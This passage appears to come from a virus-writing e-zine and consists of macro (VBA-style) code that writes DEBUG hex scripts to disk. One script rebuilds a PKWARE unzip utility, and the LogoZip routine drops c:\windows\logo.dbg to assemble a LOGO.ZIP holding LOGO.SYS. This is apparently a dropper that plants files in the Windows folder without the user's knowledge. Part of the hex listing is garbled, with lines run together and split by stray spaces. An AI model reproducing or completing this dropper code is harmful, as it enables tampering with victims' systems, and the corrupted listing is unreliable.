Print #2, "E 0650 20 B7 72 03 E8 07 00 8A 34 46 B5 08 9D C3 50 51"
Print #2, "E 0660 52 B9 00 08 BA 20 AF 8B F2 E8 51 FC 5A 59 58 C3"
Print #2, "E 0670 2A E9 77 0D F6 DD 2A CD D3 EA 8A CD E8 CE FF 2A"
Print #2, "E 0680 E9 D3 EA C3 8A DA 32 FF D1 E3 8B 9F 62 A0 85 DB"
Print #2, "E 0690 78 0E 8A 8F 02 9F E8 D7 FF 93 3D 09 01 73 09 C3"
Print #2, "E 06A0 B8 62 A4 E8 26 00 EB EE 3D 1D 01 74 1B 2D 01 01"
Print #2, "E 06B0 8A C8 D0 E9 D0 E9 49 25 03 00 04 04 D3 E0 05 01"
Print #2, "E 06C0 01 93 E8 52 FF 03 C3 C3 B8 00 02 C3 B1 08 E8 9F"
Print #2, "E 06D0 FF 56 96 8A C2 32 C9 F7 D3 FE C1 D1 EB D1 E8 D1"
Print #2, "E 06E0 D3 D1 E3 8B 18 85 DB 78 EE 5E C3 8A DA 32 FF D1"
Print #2, "E 06F0 E3 8B 9F 62 A2 85 DB 78 1F 8A 8F 42 A0 E8 70 FF"
Print #2, "E 0700 80 FB 04 72 12 93 8A C8 D0 E9 49 24 01 04 02 D3"
Print #2, "E 0710 E0 93 E8 02 FF 03 D8 C3 B8 E2 A8 E8 AE FF EB DD"
Print #2, "E 0720 56 51 BF 02 9F B9 90 00 B0 08 F3 AA B1 70 FE C0"
Print #2, "E 0730 F3 AA B1 18 B0 07 F3 AA B1 08 FE C0 F3 AA BF 42"
Print #2, "E 0740 A0 B1 20 89 0E FA A9 B0 05 F3 AA C7 06 D4 AE 20"
Print #2, "E 0750 01 E9 D4 00 B1 02 E8 BE FE 48 79 03 E9 13 FE 57"
Print #2, "E 0760 74 BE 48 74 03 E9 E2 00 B1 05 E8 AA FE 05 01 01"
Print #2, "E 0770 A3 D4 AE B1 05 E8 9F FE 40 A3 FA A9 51 BF BC AE"
Print #2, "E 0780 B9 13 00 32 C0 F3 AA 59 B1 04 E8 8A FE 05 04 00"
Print #2, "E 0790 BF 96 0B 8B EF 03 E8 33 DB B1 03 E8 79 FE 8A 1D"
Print #2, "E 07A0 88 87 BC AE 47 3B FD 72 F0 56 51 BF 20 B7 BE BC"
Print #2, "E 07B0 AE B8 13 00 E8 9B 00 59 5E 8B 2E D4 AE 03 2E FA"
Print #2, "E 07C0 A9 BF 02 9F 32 FF 8A DA D1 E3 8B 9F 20 B7 8A 8F"
Print #2, "E 07D0 BC AE E8 9B FE 8A C3 3C 10 73 06 AA 4D
75 E 5 EB"Print #2, "E 07E0 35 77 0C B1 02 E8 2F FE 04 03 8A 4D FF EB 1 7 3C"Print #2, "E 07F0 11 77 09 B1 03 E8 1F FE 04 03 EB 08 B1 07 E 8 16"Print #2, "E 0800 FE 05 0B 00 32 C9 51 86 C1 32 ED 2B E9 72 3 B F3"Print #2, "E 0810 AA 59 85 ED 75 AE 56 51 BE 02 9F BF 42 A0 0 3 36"Print #2, "E 0820 D4 AE 8B 0E FA A9 F3 A4 A1 D4 AE BE 02 9F B F 62"Print #2, "E 0830 A0 BD 62 A4 E8 1B 00 A1 FA A9 BE 42 A0 BF 6 2 A2"Print #2, "E 0840 BD E2 A8 E8 0C 00 59 5E 5F C3 BA 81 0B B0 0 4 E9"Print #2, "E 0850 EA F8 85 C0 74 F3 52 A3 D6 A9 89 3E D8 AE B F D8"Print #2, "E 0860 A9 57 B9 10 00 33 C0 F3 AB 5F 56 8B 0E D6 A 9 33"Print #2, "E 0870 DB AC 8A D8 D1 E3 FF 01 E2 F7 BE B2 A9 BB 0 2 00"Print #2, "E 0880 33 C0 89 00 B1 0F 03 87 D8 A9 D1 E0 43 43 8 9 00"Print #2, "E 0890 E2 F4 83 38 00 74 12 BE DA A9 B9 0F 00 33 D B AD"Print #2, "E 08A0 03 D8 E2 FB 83 FB 01 77 A1 5E 56 8B 0E D6 A 9 BF"Print #2, "E 08B0 C0 0B AC 32 E4 85 C0 74 0E 8B D8 D1 E3 8B 8 7 B2"Print #2, "E 08C0 A9 40 89 87 B2 A9 48 AB E2 E8 5E 56 BF C0 0 B 8B"Print #2, "E 08D0 16 D6 A9 AC 8A C8 49 78 17 74 15 8B 1D 33 C 0 D1"Print #2, "E 08E0 EB D1 D0 E0 FA 41 D1 EB D3 D0 AB 4A 75 E5 E B 07"Print #2, "E 08F0 47 47 33 C9 4A 75 DC 5E 8B 3E D8 AE B9 00 0 1 33"Print #2, "E 0900 C0 F3 AB BF C0 0B 8B 16 D6 A9 A3 D6 A9 4A 0 3 F2"Print #2, "E 0910 03 FA 03 FA FD AC 84 C0 74 1E 3C 08 77 22 9 1 B8"Print #2, "E 0920 01 00 41 D3 E0 8B 1D D1 E3 56 8B 36 D8 AE 8 9 10"Print #2, "E 0930 03 D8 80 FF 02 72 F7 5E 4F 4F 4A 79 D8 FC 5 A C3"Print #2, "E 0940 2C 08 8A C8 8B 05 8A D8 32 FF D1 E3 03 1E D 8 AE"Print #2, "E 0950 B5 01 56 52 83 3F 00 75 18 8B 16 D6 A9 8B F 2 D1"Print #2, "E 0960 EA F7 D2 89 17 83 06 D6 A9 04 33 D2 89 12 8 9 52"Print #2, "E 0970 02 8B 1F F7 D3 D1 E3 03 DD 84 E5 74 02 43 4 3 D0"Print #2, "E 0980 E5 FE C9 75 CF 5A 89 17 EB AD 51 52 8B CF B A 00"Print #2, "E 0990 0E 8B FA 2B CA 89 0E DC AE E8 03 00 5A 59 C 3 53"Print #2, "E 09A0 52 E8 DC F9 5A 8B 1E D0 AE B4 40 CD 21 5B 3 B C1"Print #2, "E 09B0 75 01 C3 B4 3E CD 21 BA 2C 
AA B4 41 CD 21 B A B1"Print #2, "E 09C0 0B B0 06 E9 76 F7 0D 0A 50 4B 55 4E 5A 4A 5 2 28"Print #2, "E 09D0 54 4D 29 20 20 46 41 53 54 21 20 20 4D 69 6 E 69"Print #2, "E 09E0 20 45 78 74 72 61 63 74 20 55 74 69 6C 69 7 4 79"

Page 322: EZine - Coderz #1

Print #2, "E 09F0 20 20 56 65 72 73 69 6F 6E 20 32 2E 30 34 6 7 20"Print #2, "E 0A00 20 30 32 2D 30 31 2D 39 33 0D 0A 43 6F 70 7 2 2E"Print #2, "E 0A10 20 31 39 38 39 2D 31 39 39 33 20 50 4B 57 4 1 52"Print #2, "E 0A20 45 20 49 6E 63 2E 20 41 6C 6C 20 52 69 67 6 8 74"Print #2, "E 0A30 73 20 52 65 73 65 72 76 65 64 2E 0D 0A 00 5 0 4B"Print #2, "E 0A40 55 4E 5A 4A 52 3A 20 00 0D 0A 00 53 65 61 7 2 63"Print #2, "E 0A50 68 69 6E 67 20 5A 49 50 3A 20 00 57 61 72 6 E 69"Print #2, "E 0A60 6E 67 21 20 00 00 50 4B 00 00 45 72 72 6F 7 2 20"Print #2, "E 0A70 69 6E 20 5A 49 50 20 2D 20 55 73 65 20 50 4 B 5A"Print #2, "E 0A80 69 70 46 69 78 00 44 6F 20 79 6F 75 20 77 6 1 6E"Print #2, "E 0A90 74 20 74 6F 20 65 78 74 72 61 63 74 20 74 6 8 65"Print #2, "E 0AA0 73 65 20 66 69 6C 65 73 20 6E 6F 77 20 28 7 9 2F"Print #2, "E 0AB0 6E 29 3F 20 00 54 6F 6F 20 6D 61 6E 79 20 6 6 69"Print #2, "E 0AC0 6C 65 73 00 43 61 6E 27 74 20 4F 70 65 6E 3 A 20"Print #2, "E 0AD0 00 55 73 61 67 65 3A 20 20 70 6B 75 6E 7A 6 A 72"Print #2, "E 0AE0 20 5B 2D 6F 5D 20 66 69 6C 65 6E 61 6D 65 5 B 2E"Print #2, "E 0AF0 7A 69 70 5D 20 5B 6F 75 74 70 75 74 5F 70 6 1 74"Print #2, "E 0B00 68 5D 0D 0A 00 55 6E 6B 6E 6F 77 6E 20 63 6 F 6D"Print #2, "E 0B10 70 72 65 73 73 69 6F 6E 20 6D 65 74 68 6F 6 4 20"Print #2, "E 0B20 66 6F 72 3A 20 00 20 61 6C 72 65 61 64 79 2 0 65"Print #2, "E 0B30 78 69 73 74 73 21 20 4F 76 65 72 77 72 69 7 4 65"Print #2, "E 0B40 3F 20 00 43 61 6E 27 74 20 63 72 65 61 74 6 5 3A"Print #2, "E 0B50 20 00 66 69 6C 65 20 66 61 69 6C 73 20 43 5 2 43"Print #2, "E 0B60 20 63 68 65 63 6B 00 45 78 74 72 61 63 74 6 9 6E"Print #2, "E 0B70 67 3A 20 00 20 49 6E 66 6C 61 74 69 6E 67 3 A 20"Print #2, "E 0B80 00 46 69 6C 65 20 68 61 73 20 61 20 62 61 6 4 20"Print #2, "E 0B90 74 61 62 6C 65 00 10 11 12 00 08 07 09 06 0 A 05"Print #2, "E 0BA0 0B 04 0C 03 0D 02 0E 01 0F 01 03 07 0F 1F 3 F 7F"Print #2, "E 0BB0 FF 64 69 73 6B 20 66 75 6C 6C 00 00 01 00"Print #2, "RCX"Print #2, "0ABE"Print #2, "W"Print #2, "Q"Close 
#2End Sub

Sub LogoZip()
Open "c:\windows\logo.dbg" For Output As #3
Print #3, "N LOGO.ZIP"
Print #3, "E 0100 50 4B 03 04 14 00 00 00 08 00 38 51 9B 28 17 D3"
Print #3, "E 0110 09 49 36 12 00 00 36 F8 01 00 08 00 00 00 6C 6F"
Print #3, "E 0120 67 6F 2E 53 59 53 ED 9D 39 8F 2B C7 15 46 6B 04"
Print #3, "E 0130 07 8E E4 3F 20 28 36 6C 28 15 60 40 81 E1 44 81"
Print #3, "E 0140 E0 50 89 52 45 0A 9D 39 B3 33 67 86 23 47 4A 9D"
Print #3, "E 0150 28 76 A0 DC 86 42 07 86 9D 71 E9 66 73 99 85 FB"
Print #3, "E 0160 BE CC 0C 7D 6F 55 F5 CA 2E D7 13 6E BF 9E 9E E1"
Print #3, "E 0170 77 04 E1 91 C5 4B 72 FA 9B EA 66 73 58 F7 F0 37"
Print #3, "E 0180 BF FD 74 7F A3 98 4F 7F A2 D4 CF E9 DF 5F D3 D5"
Print #3, "E 0190 BF D0 FF 37 EA A7 7A 5C AD 6F D4 BF 3E 54 EA 9F"
Print #3, "E 01A0 1F 9A AB 2D F3 8F 3A D3 7F EA 7C 56 00 80 F7 CD"
Print #3, "E 01B0 59 FD 4C CD D5 C7 2A 54 9F A8 7F AB CF D4 3F D4"
Print #3, "E 01C0 17 EA EF EA 2B F5 37 F5 8D FA AB FA BD FA 13 FD"
Print #3, "E 01D0 F7 7B BA F4 0D 8D 7C 45 B7 7C 41 15 9F 51 E5 27"
Print #3, "E 01E0 74 8F 8F E9 9E 3F E3 BD 55 2D 68 1F 8E 3E 52 EA"
Print #3, "E 01F0 BF BF 50 EA 87 5F 29 F5 FD E7 4A 7D F7 A5 52 DF"
Print #3, "E 0200 7E AD D4 9F 7F A7 D4 1F FF A0 D4 EF FE AC D4 D7"
Print #3, "E 0210 DF 2A F5 E5 77 4A 7D FE BD 52 BF FA 41 A9 5F FE"
Print #3, "E 0220 47 A9 8F 22 A5 3E 5C E8 1F 45 3D 4C 66 8B D5 66"
Print #3, "E 0230 77 38 3D 9D DB DD A0 D7 1F DE DE 8F A7 3C B4 DD"
Print #3, "E 0240 1F 69 AC D5 09 C2 A8 3F 1C DD DD 3F 4C 68 78 B9"
Print #3, "E 0250 5A 6F B6 BB C3 F1 78 7A 7C 7A 3E B7 5A ED 4E A7"
Print #3, "E 0260 DB 0D 82 30 EC F5 7A 51 16 BA 1E 86 41 D0 ED 76"
Print #3, "E 0270 3A ED 56 EB FC FC F4 78 3A 1E 0F BB ED 66 BD 5A"
Print #3, "E 0280 2E 66 D3 C9 C3 FD DD 68 D8 8F C2 A0 D3 3A 3F 9D"
Print #3, "E 0290 8E FB ED 66 45 C3 E3 FB DB 61 BF 17 74 DB 34 76"
Print #3, "E 02A0 D8 F1 D0 E4 E1 6E 34 88 C2 6E A7 F5 FC 48 55 EB"
Print #3, "E 02B0 E5 7C AA 87 A8 AA 43 55 34 B6 DB AC ED 23 DE 8E"
Print #3, "E 02C0 86 34 1E 06 5D 7A 4A 7E 46 7A CA C3 61 BF DF 6D"
Print #3, "E 02D0 B7 DB CD 66 CD AC 0C FA F2 66 43 E3 BB FD FE 70"
Print #3, "E 02E0 A0 8D D1 5B D3 EE 74 83 B0 D7 1F 0C 47 B7 76 6B"
Print #3, "E 02F0 D7 9B DD FE F8 48 C9 74 28 99 C1 E8 8E 46 E7 CB"
Print #3, "E 0300 35 25 F3 F8 DC EA 74 C3 48 0F E9 FC CC 90 CE 4F"
Print #3, "E 0310 0F 71 15 65 AA CB F8 AE 34 4A B1 CE F9 21 E9 49"
Print #3, "E 0320 0F 3A 3F 7E 4A 0E 30 B0 01 26 11 EA CB 1C 5F C0"
Print #3, "E 0330 F1 F1 C6 E8 FC 0E 7B CE 6F B9 98 53 50 0F 77 B7"
Print #3, "E 0340 1C 82 0E 86 B2 E2 64 74 58 3A 3F 13 56 2E 3F 93"
Print #3, "E 0350 A8 CE 8F 42 E6 A1 4C F2 CB F9 6C 62 1F 31 E2 FC"
Print #3, "E 0360 32 BF 31 8A 6F 67 E3 5B 65 B1 01 EE 38 C0 74 36"
Print #3, "E 0370 70 7E 91 DD DA C9 6C BE CC CD 22 1A A6 A9 C5 F9"
Print #3, "E 0380 D9 D9 A6 F3 B3 43 F9 48 79 88 E6 24 8D E9 49 19"
Print #3, "E 0390 0D 28 D5 FB 31 0D 9B 09 68 7E 67 F4 94 36 40 3D"
Print #3, "E 03A0 03 4D 82 31 61 32 FB 28 3E B3 31 34 17 CC F4 A3"
Print #3, "E 03B0 29 34 BE A7 A4 06 91 9E 6A 94 D5 81 27 91 9D 59"
Print #3, "E 03C0 F9 C9 66 67 64 27 33 23 F5 10 47 4A 55 3A D3 95"
Print #3, "E 03D0 7D 44 9E 7E 51 3A FD 4E 27 1B DF 86 E3 D3 A9 2D"
Print #3, "E 03E0 0D 36 41 1A B7 01 9E 4E E9 04 8C 78 02 DA AD 5D"
Print #3, "E 03F0 E9 AC 28 19 0E 4B EF 9A 99 BD B5 63 F7 56 DF F1"
Print #3, "E 0400 06 B8 E1 BD D5 5F 05 5C F0 DE EA AF 02 2E F8 98"
Print #3, "E 0410 E8 AF 02 2E F8 00 E8 AF 02 2E F8 CC CE 5F 05 5C"
Print #3, "E 0420 F0 E9 8A BF 0A B8 E0 33 3B 7F 15 70 C1 67 80 FE"
Print #3, "E 0430 2A E0 82 DF 9A F9 AB 80 0B 7E BF E6 AF 02 2E F8"
Print #3, "E 0440 5D 9D BF 0A B8 E0 B7 C0 FE 2A E0 82 FF B6 E2 AF"
Print #3, "E 0450 02 2E F8 0F 56 FE 2A E0 82 FF 38 EA AF 02 2E F8"
Print #3, "E 0460 6F 80 FE 2A E0 82 FF 2E ED AF 02 2E F8 EF D2 FE"
Print #3, "E 0470 2A E0 82 3F DD F0 57 01 17 FC 91 9B BF 0A B8 E0"
Print #3, "E 0480 8F DC FC 55 C0 05 7F 8A E9 AF 02 2E F8 53 4C 6F"
Print #3, "E 0490 11 70 C2 6B 0E BC 45 C0 09 7F B2 EE AF 02 2E 78"
Print #3, "E 04A0 19 87 BF 0A B8 E0 A5 31 FE 2A E0 82 17 0D F9 AB"
Print #3, "E 04B0 80 0B 5E 60 E5 AF 02 2E 78 1D 96 BF 0A B8 E0 15"
Print #3, "E 04C0 92 FE 2A E0 82 57 4D FA AB 80 0B 5E DC EB AF 02"
Print #3, "E 04D0 2E 78 21 AA BF 0A B8 E0 C5 BD FE 2A E0 82 97 8D"
Print #3, "E 04E0 FB AB 80 0B 5E 9D EF AF 02 2E 78 25 BE BF 0A B8"
Print #3, "E 04F0 E0 1E 0F 7F 15 70 C1 7D 33 FE 2A E0 82 9B B4 FC"
Print #3, "E 0500 55 C0 05 B7 22 F9 AB 80 0B 6E 1C F4 57 01 17 DC"
Print #3, "E 0510 38 E8 AF 02 2E B8 BF D0 5F 05 5C 70 2F A6 BF 0A"
Print #3, "E 0520 B8 E0 06 61 7F 15 70 C1 9D D3 FE 2A E0 82 DB CC"
Print #3, "E 0530 FD 55 C0 05 37 A3 FB AB 80 0B EE F0 F7 57 01 17"
Print #3, "E 0540 AC 8E F0 57 01 17 AC E8 F0 57 01 17 6C E3 F0 57"
Print #3, "E 0550 01 17 2C CA F1 57 01 17 2C CA F1 57 01 17 EC D8"
Print #3, "E 0560 F1 57 01 17 AC 23 F2 57 01 17 2C C9 F2 57 01 17"
Print #3, "E 0570 2C 0F F3 57 01 17 AC FA F3 57 01 17 AC FA F3 57"
Print #3, "E 0580 01 17 AC FA F3 57 01 17 6C 4F F4 57 01 17 2C 54"
Print #3, "E 0590 F4 57 01 17 EC 3A F5 57 01 17 6C 85 F5 57 01 17"
Print #3, "E 05A0 6C 94 F5 57 01 17 2C 3A F6 57 01 17 2C 2B F6 57"
Print #3, "E 05B0 01 17 2C 3A F6 57 01 17 F0 3F CB 80 FF 59 06 FC"
Print #3, "E 05C0 CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03"
Print #3, "E 05D0 FE 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96"
Print #3, "E 05E0 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F"
Print #3, "E 05F0 CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8"
Print #3, "E 0600 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06"
Print #3, "E 0610 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C"
Print #3, "E 0620 A3 46 FF F3 0D E1 AF 7A 0F DC 24 F8 6B 7F 2C 35"
Print #3, "E 0630 FA 9F 2F 36 E0 83 12 1C F7 15 71 93 C1 5F FD E3"
Print #3, "E 0640 A8 D1 FF FC 62 F9 25 BC 87 00 AB F0 3F A7 3F 54"
Print #3, "E 0650 F6 C7 BB 48 E4 5D 67 41 5A 90 29 2D CF F8 E2 F1"
Print #3, "E 0660 D2 9B CB 7E 19 EF 25 3F B1 BF F8 5D B7 37 DE 54"
Print #3, "E 0670 5F 82 EF 9C DF 4D 86 4C 59 F1 D2 7B DD 81 2B F0"
Print #3, "E 0680 3F 97 6D 6F D9 76 94 E6 52 86 6B 73 0B 53 EA C7"
Print #3, "E 0690 3C EF 4D FC 6F F5 F9 89 FD C5 AF 21 BF E2 A5 CA"
Print #3, "E 06A0 A8 C0 FF 5C FD 76 98 DB 2F AA 9A 99 9F D8 5F 7C"
Print #3, "E 06B0 93 C3 8C BD 64 7E 1F 14 8A 93 5B 33 3F 5F 65 54"
Print #3, "E 06C0 E0 7F 2E CD E5 83 0C 99 BA 38 17 CF 66 DC DC DC"
Print #3, "E 06D0 94 54 15 F2 2B DB CF 3F C8 51 52 57 7D 7E 62 7F"
Print #3, "E 06E0 71 FA 53 E5 7E BE C2 46 E4 36 A3 F8 10 45 CA EB"
Print #3, "E 06F0 8A F9 95 D4 99 92 C2 13 27 BF BA F7 90 5F 05 FE"
Print #3, "E 0700 67 47 7E 22 4A 63 BE CC EF E5 A9 C0 FF 5C 4B 7E"
Print #3, "E 0710 17 B3 B9 21 54 E1 7F 4E 37 B4 BA DD A3 F8 AB 68"
Print #3, "E 0720 6E 7E F0 17 4B 80 FF 59 06 FC CF 32 E0 7F 96 01"
Print #3, "E 0730 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB"
Print #3, "E 0740 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F"
Print #3, "E 0750 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC"
Print #3, "E 0760 CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03"
Print #3, "E 0770 FE 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96"
Print #3, "E 0780 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F"
Print #3, "E 0790 CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8"
Print #3, "E 07A0 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06"
Print #3, "E 07B0 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C"
Print #3, "E 07C0 03 FE 67 19 B5 FA 9F A7 93 87 FB BB DB D1 70 10"
Print #3, "E 07D0 F5 E2 27 3D EC B7 EB D5 62 36 1D DF DF E5 DE 47"
Print #3, "E 07E0 D2 58 EE 73 D5 5D D2 E5 D3 6F D4 EF BB 46 FF F3"
Print #3, "E 07F0 6C 3A 19 73 7E C3 41 3F EA 05 D6 BA 7A D8 6D D7"
Print #3, "E 0800 4B CA 6A 7C 7F 9B 7B 1F B4 9C 4F B3 9F 0B 1E 76"
Print #3, "E 0810 1B BB 4C 7B D8 EF 05 AA 39 D4 E8 7F 9E 4E 26 14"
Print #3, "E 0820 09 4F 3F 7A DB 1D 74 52 6D 23 65 75 F1 19 7E 21"
Print #3, "E 0830 BF FD 36 CE 6F 10 85 41 B1 F8 05 A9 D1 FF CC D3"
Print #3, "E 0840 8F F3 1B D0 09 67 D8 ED A4 DA C1 45 3E 2B 33 36"
Print #3, "E 0850 9B 64 3F 17 A4 BD DC 2E D3 A6 FC 9A 24 0C AE D1"
Print #3, "E 0860 FF 3C 19 73 7E 34 FD 28 BF A0 DB CE E4 37 9B F8"
Print #3, "E 0870 F2 DB 6D E2 FC FA C9 AE DF 08 6A F4 3F F3 D1 8F"
Print #3, "E 0880 F3 EB D3 09 27 ED BE A9 76 70 9E CF CA 8C D1 2B"
Print #3, "E 0890 4A E6 2A 1D FE 38 51 3A 78 52 7E 4D 12 06 D7 E8"
Print #3, "E 08A0 7F 1E 3F 70 7E FC EA 41 6F BB 3B AD 4C 7E D3 B1"
Print #3, "E 08B0 2F 3F 7E 91 36 97 68 F7 6D 52 7E 35 FA 9F F9 C5"
Print #3, "E 08C0 37 BE 4C BB 6F AA 1D 9C E5 B3 32 63 34 D9 32 57"
Print #3, "E 08D0 E9 F0 67 97 69 53 7E 4D 12 06 D7 E8 7F 7E B8 4F"
Print #3, "E 08E0 F3 A3 DD 37 93 DF E4 21 9B 1F 9F 11 9A FC D2 D7"
Print #3, "E 08F0 8A CD 2A CE AF 97 7D E5 7E 79 6A F4 3F F3 B9 5F"
Print #3, "E 0900 7C 99 76 5F A3 1D E4 60 A6 F6 C0 66 6F E3 D7 5A"
Print #3, "E 0910 DE 7D E9 95 3A 93 DF C2 2E D3 A6 FC EA 12 06 BF"
Print #3, "E 0920 0B 35 FA 9F EF EF D2 FC 68 F7 35 F9 25 6F 3E 06"
Print #3, "E 0930 49 7E 3B 9D 29 9F 50 67 5E 2B 96 49 97 4F A3 76"
Print #3, "E 0940 DF 3A FD CF 6F 92 1A FD CF 6F 92 2A FC CF D7 4C"
Print #3, "E 0950 05 FE E7 AB A6 02 FF F3 55 53 81 FF F9 AA A9 C0"
Print #3, "E 0960 FF 7C D5 54 E0 7F BE 6A 2A F0 3F 5F 35 15 F8 9F"
Print #3, "E 0970 AF 9A 0A FC CF 57 4D 05 FE E7 AB A6 0A FF F3 35"
Print #3, "E 0980 03 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F"
Print #3, "E 0990 CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8"
Print #3, "E 09A0 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06"
Print #3, "E 09B0 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C"
Print #3, "E 09C0 03 FE 67 19 F0 3F CB 80 FF 59 46 15 FE E7 20 0C"
Print #3, "E 09D0 7B BD 28 8A FA 84 1D EA F7 23 D3 96 1D 04 DD B8"
Print #3, "E 09E0 5F E3 F1 74 BA F8 A8 B4 DF 0B B9 95 E1 F1 A4 FB"
Print #3, "E 09F0 08 33 37 D0 D8 71 9F 76 2D 68 9E A8 2A 73 95 7B"
Print #3, "E 0A00 C0 9E 69 8C 7B E3 E2 3A D3 DB 19 D4 D7 22 52 85"
Print #3, "E 0A10 FF 99 F2 33 01 52 84 76 88 2F F3 BF 21 C7 97 E4"
Print #3, "E 0A20 77 BC F8 A8 8F 1B 31 DB 67 CA 8A 1B 2C 33 F9 B5"
Print #3, "E 0A30 CF 3A 98 7C 7E 94 68 3E BF 24 F9 D5 C2 D6 E9 DE"
Print #3, "E 0A40 4E 6E 4E 6C D7 B4 AA BB 2A FF 33 05 98 ED CB 8D"
Print #3, "E 0A50 22 7D 55 CF BE B8 5F E3 74 2C C9 2F 2C ED C6 A2"
Print #3, "E 0A60 4C 4B 56 D5 F1 8C CC 5C CD F5 80 A5 F0 F4 53 ED"
Print #3, "E 0A70 D6 B9 9E 65 A1 55 F9 9F 79 06 66 AE F6 7A 71 7E"
Print #3, "E 0A80 14 5F 92 DF E1 E2 A3 BE 5E 59 37 96 AB C5 83 A7"
Print #3, "E 0A90 5A E6 6A 90 ED 01 4B D1 F9 29 CA AF 96 75 8D 55"
Print #3, "E 0AA0 F9 9F 79 1F CE 5C ED F5 F8 AA 99 7D F1 AE 74 3C"
Print #3, "E 0AB0 94 E4 17 5C B6 73 38 3B DC 28 BF EC DF 7A 73 3D"
Print #3, "E 0AC0 60 29 F6 E8 F7 FC F4 58 C7 C2 A8 AA FC CF 41 90"
Print #3, "E 0AD0 CB 2F E4 38 29 3E DA 93 DA AD 24 BF FD C5 47 7D"
Print #3, "E 0AE0 7C A8 3A 3F D1 8E 99 19 73 76 B8 D1 EE 9B CF CF"
Print #3, "E 0AF0 1E 38 F3 55 75 E7 57 8D BF B8 1B 04 41 E6 6A 18"
Print #3, "E 0B00 06 F6 95 97 E2 B3 7B D9 61 BF DF 6D D6 AB E5 62"
Print #3, "E 0B10 9E AA 0D 72 7D D4 16 67 87 1B BF 20 67 AE 26 3D"
Print #3, "E 0B20 60 79 28 3E BE 3B C5 57 C7 C2 A8 AA FC CF DD 6E"
Print #3, "E 0B30 2E BF 20 8E 4F 51 7C 49 7E BB 8B 8F FA 72 7D D4"
Print #3, "E 0B40 C9 20 9D 97 94 2D 8A A5 A9 96 CF AF F4 10 67 F2"
Print #3, "E 0B50 AB 69 FA 55 E6 7F EE F0 BE 9A C2 E9 99 13 17 8A"
Print #3, "E 0B60 CF 1E A5 F6 BB 92 FC CA 5F 43 F9 EC 2F 37 A0 E7"
Print #3, "E 0B70 9A 96 48 A4 CD 9A BC FB 96 DC 97 E2 6B D5 16 5F"
Print #3, "E 0B80 25 FE E7 56 BB DD EE 70 80 34 09 ED 50 37 8E 4F"
Print #3, "E 0B90 51 7C 49 7E 5B BD FB 6A 0F 87 ED 64 E5 3E EA A7"
Print #3, "E 0BA0 13 1F D8 B8 8F 30 7D 48 3E 55 DE AC 53 89 44 C7"
Print #3, "E 0BB0 9E 4F 9B 2E 74 33 66 0E 9C BA DB 30 11 00 E8 73"
Print #3, "E 0BC0 67 6E 4E 7C AA 69 55 77 15 FE E7 73 AB C5 01 EA"
Print #3, "E 0BD0 04 ED 10 A7 67 5E 44 29 3E BB 97 ED B6 FC 46 81"
Print #3, "E 0BE0 8E 7E 5A 03 63 EB D2 37 1F 05 E1 CB C1 B6 EC 9B"
Print #3, "E 0BF0 6B FA A5 22 6E 6C B5 F7 B5 6F 3E F8 E4 79 1A D7"
Print #3, "E 0C00 E9 73 E7 BA CE 5D 18 F8 9F 65 C0 FF 2C 03 FE 67"
Print #3, "E 0C10 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF"
Print #3, "E 0C20 B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80"
Print #3, "E 0C30 FF 59 06 FC CF 32 E0 7F 96 51 AB FF F9 0D 52 A3"
Print #3, "E 0C40 FF F9 4D 52 A3 FF F9 4D 52 A3 FF F9 4D 52 A3 FF"
Print #3, "E 0C50 F9 4D 52 A3 FF F9 4D 52 A3 FF F9 4D 52 A3 FF B9"
Print #3, "E 0C60 04 B3 76 CF 0A 64 A3 64 30 23 1B FF BF 77 6F 00"
Print #3, "E 0C70 35 FA 9F 5D 14 F4 ED E9 2A 17 F6 17 97 DE A3 41"
Print #3, "E 0C80 D4 E8 7F 76 91 7E FA 9D E7 36 9D 92 CD A5 46 FF"
Print #3, "E 0C90 B3 8B 32 7D BB 52 C5 2F 54 69 28 0D F0 3F F3 97"
Print #3, "E 0CA0 CF 5C 0C D2 E1 EF 55 7C 2E D8 00 FF F3 34 FF 55"
Print #3, "E 0CB0 01 4C E1 DB 3F 1A 4C 03 FC CF D3 71 31 BF 65 C9"
Print #3, "E 0CC0 17 D2 34 94 06 F8 9F F9 BB A3 B2 D7 37 49 37 C2"
Print #3, "E 0CD0 2B A0 01 FE E7 C9 43 2E 3F 3E FB 33 97 1A F6 55"
Print #3, "E 0CE0 33 A5 BC AC FF 59 AF DD A3 DD 77 34 E4 46 24 33"
Print #3, "E 0CF0 C6 8B FC F8 EC 79 D4 B0 6F 8A 2A 07 FE 67 19 F0"
Print #3, "E 0D00 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C"
Print #3, "E 0D10 F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59"
Print #3, "E 0D20 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF"
Print #3, "E 0D30 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0"
Print #3, "E 0D40 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19"
Print #3, "E 0D50 F0 3F CB A8 C8 FF 1C F5 FB 03 66 98 59 F3 C8 0E"
